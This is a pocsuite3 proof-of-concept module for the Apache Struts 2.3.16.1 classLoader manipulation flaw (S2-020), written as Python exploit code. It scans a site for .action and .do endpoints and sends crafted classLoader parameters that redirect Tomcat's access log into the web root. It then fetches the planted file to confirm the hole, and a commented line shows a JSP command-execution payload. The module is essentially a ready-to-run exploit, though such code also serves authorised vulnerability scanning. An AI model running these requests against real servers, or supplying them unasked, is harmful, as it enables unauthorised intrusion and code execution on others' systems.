""" If you have issues about development, please read: https://github.com/knownsec/pocsuite3/blob/master/docs/CODING.md for more about information, plz visit http://pocsuite.org """ from pocsuite3.api import Output, POCBase, register_poc, requests, logger from pocsuite3.api import get_listener_ip, get_listener_port from pocsuite3.api import REVERSE_PAYLOAD from pocsuite3.lib.utils import random_str from requests.exceptions import ReadTimeout import base64 import re from urllib.parse import urlparse from urllib.parse import urljoin import time class DemoPOC(POCBase): vulID = '1228' # ssvid version = '1' author = ['chenghs@knownsec.com'] vulDate = '2014-04-23' createDate = '2014-04-23' updateDate = '2014-04-23' references = ['http://sec.baidu.com/index.php?research/detail/id/18'] name = 'struts 2.3.16.1 代码执行漏洞 POC' appPowerLink = 'http://struts.apache.org/' appName = 'struts' appVersion = '2.3.16.1#' vulType = 'Code Execution' desc = ''' ''' samples = [] install_requires = [''] def getLink(self, url): '''使用正则得到页面中.action和.do链接''' rnt = [] page_content = requests.get(url).text match = re.findall(r'''(?:href|action|src)\s*?=\s*?(?:"|')\s*?([^'"]*?\.(?:action|do))''', page_content) for item_url in match: if 'http' not in item_url: item_url = urljoin(url, item_url) rnt.append(item_url) return rnt def _verify(self): result = {} url = self.url if url.endswith('.do') or url.endswith('.action'): url_actions = [url] else: url = url.strip('/') + '/' url_actions = self.getLink(url) if not url_actions: url_actions = [url] for url_action in url_actions: directory_url = url_action + "?class[%27classLoader%27][%27resources%27].context.parent.pipeline.first.directory=webapps/ROOT" prefix_url = url_action + "?class[%27classLoader%27][%27resources%27].context.parent.pipeline.first.prefix=S2_020" suffix_url = url_action + "?class[%27classLoader%27][%27resources%27].context.parent.pipeline.first.suffix=.txt" filedataformat_url = url_action + 
"?class[%27classLoader%27][%27resources%27].context.parent.pipeline.first.fileDateFormat=1" # cmd = url + 'aaaa.jsp?a=<%Runtime.getRuntime().exec("cmd /c dir");%>' shelljsp_url = urljoin(url_action, '/') + 'S2_0201.txt' try: directory_request = requests.get(directory_url) time.sleep(1) prefix_request = requests.get(prefix_url) time.sleep(1) suffix_request = requests.get(suffix_url) time.sleep(1) filedataformat_request = requests.get(filedataformat_url) time.sleep(10) shell_request = requests.get(shelljsp_url) shell_content = shell_request.text match = re.search('context.parent.pipeline.first.fileDateFormat=1', shell_content) if match: result['VerifyInfo'] = {} result['VerifyInfo']['URL'] = shelljsp_url except Exception as e: logger.debug(str(e)) return self.parse_output(result) def parse_output(self, result): output = Output(self) if result: output.success(result) else: output.fail('target is not vulnerable') return output def _attack(self): return self._verify() register_poc(DemoPOC)
暂无临时解决方案
暂无官方解决方案
暂无防护方案